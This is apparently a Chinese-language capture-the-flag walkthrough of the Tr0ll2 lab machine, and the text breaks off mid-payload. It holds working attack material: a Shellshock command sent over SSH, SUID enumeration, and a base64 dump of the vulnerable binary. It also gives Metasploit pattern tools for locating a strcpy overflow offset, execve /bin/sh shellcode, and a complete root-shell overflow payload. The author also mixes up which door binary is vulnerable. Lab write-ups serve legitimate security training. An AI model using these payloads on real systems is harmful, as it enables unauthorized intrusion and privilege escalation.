2ssh -i noob -o PubkeyAcceptedAlgorithms=+ssh-rsa -o HostKeyAlgorithms=+ssh-rsa noob@172.168.169.139 '() { :;}; /bin/bash'

1python -c 'import pty; pty.spawn("/bin/bash")'

换个好看的shell，到根目录下查看发现有个nothing_to_see_here目录，此地无银三百两。

在这个文件夹下有几个door文件夹，里面有可执行文件，执行了之后，我们就好像踩雷了。所有的命令出了似乎都没有权限了就。

1noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door1$ ./r00t
2./r00t
3Good job, stand by, executing root shell...
4BUHAHAHA NOOB!
5noob@Tr0ll2:/nothing_to_see_here/choose_wisely/door2$ ./r00t
6./r00t
7
82 MINUTE HARD MODE LOL

查阅其他WP发现用下面这个命令也可以找到三个door文件夹下面的脚本。

1find / -perm -4000 -print 2>/dev/null

是一个用于查找系统中具有 SUID 权限（Set User ID） 文件的命令。发现这三个命令有SUID权限。

扩展命令

查找 SGID 文件（Set Group ID）：

find / -perm -2000 -print 2>/dev/null

查找全局可写文件：

find / -perm -0002 -type f 2>/dev/null

似乎就没法搞了，只能回复快照。

顺带找一下内核信息

1uname -a
2Linux Tr0ll2 3.2.0-29-generic-pae #46-Ubuntu SMP Fri Jul 27 17:25:43 UTC 2012 i686 i686 i386 GNU/Linux
3lsb_release -a
4sh: 0: getcwd() failed: No such file or directory
5No LSB modules are available.
6Distributor ID: Ubuntu
7Description: Ubuntu 12.04.1 LTS
8Release: 12.04
9Codename: precise

缓存溢出漏洞

方法一：gdb调试找偏移

我们重新回到ssh登录，再次找到这几个文件夹，这次我们就不执行了。先ls一下看看文件属性，可以看到door1和door2的脚本都是7.2K，只有door3的脚本比较特殊是8.3K

1ls -lahR

1cd door3
2base64 r00t

得到如下结果

 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
 33AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 34AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 35AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 36AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 37AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 38AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 39AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 40AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 41AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 42AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 43AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 44AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 45AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 46AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 47AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 48AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 49AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 51AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 52AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 53AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 54AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 55AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 56AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 57AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 58AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 59AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 60AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 61AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 62AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 63AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 64AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 65AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 66AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 67AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 68AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/////AAAAAP////8AAAAA
 69AAAAAAEAAAAQAAAADAAAAPSCBAgNAAAAXIUECPX+/2+sgQQIBQAAADyCBAgGAAAAzIEECAoAAABY
 70AAAACwAAABAAAAAVAAAAAAAAAAMAAAD0nwQIAgAAACgAAAAUAAAAEQAAABcAAADMggQIEQAAAMSC
 71BAgSAAAACAAAABMAAAAIAAAA/v//b6SCBAj///9vAQAAAPD//2+UggQIAAAAAAAAAAAAAAAAAAAA
 72AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACifBAgAAAAAAAAAAEaDBAhWgwQI
 73ZoMECHaDBAiGgwQIAAAAAAAAAABHQ0M6IChVYnVudHUvTGluYXJvIDQuNi4zLTF1YnVudHU1KSA0
 74LjYuMwAcAAAAAgAAAAAABAAAAAAARIQECGMAAAAAAAAAAAAAABEBAAACAAAAAAAEAUoAAAABcwAA
 75AD8AAABEhAQIp4QECAAAAAACBAcfAAAAAgEILAAAAAICB1sAAAACBAcaAAAAAgEGLgAAAAICBXkA
 76AAADBAVpbnQAAggFAAAAAAIIBxUAAAACBAUFAAAABARxAAAAAgEGNQAAAAQEfgAAAAVxAAAABgE6
 77AAAAAQMBTwAAAESEBAinhAQIAAAAAAIBAAAHVgAAAAEDTwAAAAKRAAeDAAAAAQMCAQAAApEECGJ1
 78ZgABBQgBAAACdBAJAQ4AAAACAAFrAAAAAecAAAAKawAAAAp4AAAAAAtWhAQIeIQECAwBbgAAAAIA
 79AQEKTwAAAAAAAAQEawAAAA1xAAAADiUAAAD/AAABEQElDhMLAw4bDhEBEgEQBgAAAiQACws+CwMO
 80AAADJAALCz4LAwgAAAQPAAsLSRMAAAUmAEkTAAAGLgE/DAMOOgs7CycMSRMRARIBQAYBEwAABwUA
 81Aw46CzsLSRMCCgAACDQAAwg6CzsLSRMCCgAACS4BPwwDDjoLOwsnDEkTPAwBEwAACgUASRMAAAsL
 82AREBEgEAAAwuAT8MAw46CzsLJww8DAAADQEBSRMAAA4hAEkTLwsAAABGAAAAAgAqAAAAAQH7Dg0A
 83AQEBAQAAAAEAAAEAYm9mLmMAAAAAPGJ1aWx0LWluPgAAAAAAAAUCRIQECBS+aAhZvgh1CEsCAgAB
 84AWxvbmcgbG9uZyBpbnQAc3RyY3B5AGxvbmcgbG9uZyB1bnNpZ25lZCBpbnQAdW5zaWduZWQgY2hh
 85cgBtYWluAC9ob21lL25vb2IAR05VIEMgNC42LjMAYXJnYwBzaG9ydCB1bnNpZ25lZCBpbnQAZXhp
 86dABib2YuYwBzaG9ydCBpbnQAYXJndgAAAAAAAQAAAAIAdAQBAAAAAwAAAAIAdAgDAAAAYgAAAAIA
 87dQhiAAAAYwAAAAIAdAQAAAAAAAAAAAAuc3ltdGFiAC5zdHJ0YWIALnNoc3RydGFiAC5pbnRlcnAA
 88Lm5vdGUuQUJJLXRhZwAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5zeW0ALmR5bnN0
 89cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnRl
 90eHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuY3RvcnMALmR0b3JzAC5q
 91Y3IALmR5bmFtaWMALmdvdAAuZ290LnBsdAAuZGF0YQAuYnNzAC5jb21tZW50AC5kZWJ1Z19hcmFu
 92Z2VzAC5kZWJ1Z19pbmZvAC5kZWJ1Z19hYmJyZXYALmRlYnVnX2xpbmUALmRlYnVnX3N0cgAuZGVi
 93dWdfbG9jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAAC
 94AAAAVIEECFQBAAATAAAAAAAAAAAAAAABAAAAAAAAACMAAAAHAAAAAgAAAGiBBAhoAQAAIAAAAAAA
 95AAAAAAAABAAAAAAAAAAxAAAABwAAAAIAAACIgQQIiAEAACQAAAAAAAAAAAAAAAQAAAAAAAAARAAA
 96APb//28CAAAArIEECKwBAAAgAAAABQAAAAAAAAAEAAAABAAAAE4AAAALAAAAAgAAAMyBBAjMAQAA
 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
129AgANAEsAAAAcoAQIAQAAAAEAGQBaAAAAIKAECAQAAAABABkAaAAAACCEBAgAAAAAAgANAAEAAAAA
130AAAAAAAAAAQA8f90AAAAGJ8ECAAAAAABABIAgQAAAIiGBAgAAAAAAQARAI8AAAAknwQIAAAAAAEA
131FACbAAAAMIUECAAAAAACAA0AsQAAAAAAAAAAAAAABADx/7cAAAAUnwQIAAAAAAAAEgDIAAAAKJ8E
132CAAAAAABABUA0QAAABSfBAgAAAAAAAASAOQAAAD0nwQIAAAAAAEAFwD6AAAAIIUECAIAAAASAA0A
133CgEAACKFBAgAAAAAEgINACEBAAAUoAQIAAAAACAAGAAsAQAAAAAAAAAAAAASAAAAPgEAABygBAgA
134AAAAEADx/0UBAABchQQIAAAAABIADgBLAQAAAAAAAAAAAAASAAAAXQEAACCfBAgAAAAAEQITAGoB
135AAAUoAQIAAAAABAAGAB3AQAAAAAAAAAAAAAgAAAAhgEAAAAAAAAAAAAAEgAAAJYBAAAYoAQIAAAA
136ABECGACjAQAAfIUECAQAAAARAA8AsgEAAAAAAAAAAAAAEgAAAM8BAACwhAQIYQAAABIADQDfAQAA
137JKAECAAAAAAQAPH/5AEAAJCDBAgAAAAAEgANAOsBAAB4hQQIBAAAABEADwDyAQAAHKAECAAAAAAQ
138APH//gEAAESEBAhjAAAAEgANAAMCAAAAAAAAAAAAACAAAAAXAgAA9IIECAAAAAASAAsAAGNydHN0
139dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1JfTElTVF9fAF9fSkNSX0xJU1RfXwBfX2RvX2dsb2Jh
140bF9kdG9yc19hdXgAY29tcGxldGVkLjYxNTkAZHRvcl9pZHguNjE2MQBmcmFtZV9kdW1teQBfX0NU
141T1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgA
142Ym9mLmMAX19pbml0X2FycmF5X2VuZABfRFlOQU1JQwBfX2luaXRfYXJyYXlfc3RhcnQAX0dMT0JB
143TF9PRkZTRVRfVEFCTEVfAF9fbGliY19jc3VfZmluaQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AGRh
144dGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAAX2VkYXRhAF9maW5pAHN0cmNweUBAR0xJQkNfMi4w
145AF9fRFRPUl9FTkRfXwBfX2RhdGFfc3RhcnQAX19nbW9uX3N0YXJ0X18AZXhpdEBAR0xJQkNfMi4w
146AF9fZHNvX2hhbmRsZQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4w
147AF9fbGliY19jc3VfaW5pdABfZW5kAF9zdGFydABfZnBfaHcAX19ic3Nfc3RhcnQAbWFpbgBfSnZf
148UmVnaXN0ZXJDbGFzc2VzAF9pbml0AA==

然后再在kali中复制解码得到r00t的脚本内容

1cat |base64 -d > r00t
2chmod +x door3/r00t
3---
4# 复制上面的base64内容，然后回车 ctrl D 结束

然后用gbd调试

1sudo apt install gdb
2gdb r00t 
3disas main

strcpy 的作用：将源字符串复制到目标缓冲区，不检查目标缓冲区长度，可能导致缓冲区溢出（Buffer Overflow）。
漏洞场景：如果目标缓冲区（如栈上的字符数组）较小，而源字符串过长，strcpy 会覆盖栈上的返回地址（或其他关键数据），导致程序崩溃或被控制流劫持。

1kali:
2ls /usr/share/metasploit-framework/tools/exploit
3cp /usr/share/metasploit-framework/tools/exploit/pattern_create.rb ./
4./pattern_create.rb -l 1000
5-----
6(gdb)run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

用以上命令生成偏移较大的值，然后复制到gdb里面run。

找到溢出位置0x6a413969

1cp /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb ./
2./pattern_offset.rb -q 6a413969 -l 1000

得知偏移量是268，以下的door2不是door3，door2要输入一个参数来做偏移量。

1(gdb)
2r $(python -c 'print ("A"*268 + "B"*4)')
3info r

1r $(python -c 'print ("A"*268 + "B"*4+"C"*20)')

到网页https://shell-storm.org/shellcode/index.html 上找execve /bin/sh找到对应版本的payload：https://shell-storm.org/shellcode/files/shellcode-827.html

 1*****************************************************
 2* Linux/x86 execve /bin/sh shellcode 23 bytes *
 3*****************************************************
 4*	 	 Author: Hamza Megahed		 *
 5*****************************************************
 6* Twitter: @Hamza_Mega *
 7*****************************************************
 8* blog: hamza-mega[dot]blogspot[dot]com *
 9*****************************************************
10* E-mail: hamza[dot]megahed[at]gmail[dot]com *
11*****************************************************
12
13xor %eax,%eax
14push %eax
15push $0x68732f2f
16push $0x6e69622f
17mov %esp,%ebx
18push %eax
19push %ebx
20mov %esp,%ecx
21mov $0xb,%al
22int $0x80
23
24********************************
25#include <stdio.h>
26#include <string.h>
27
28char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
29 "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
30
31int main(void)
32{
33fprintf(stdout,"Length: %d\n",strlen(shellcode));
34(*(void(*)()) shellcode)();
35return 0;
36}

所以，构造payload为

1./r00t $(python -c 'print "A"* 268 + "\x80\xfb\xff\xbf" + "\x90" *20 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"')
2cat /root/Proof.txt

搞错了，应该是door2不是door3。

方法二：检查坏字符

在gdb中调试

1r $(python -c 'print("A"*268 + "B"*4 + "\x01\x02\x03\x04\x05\x06\x07\x08\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f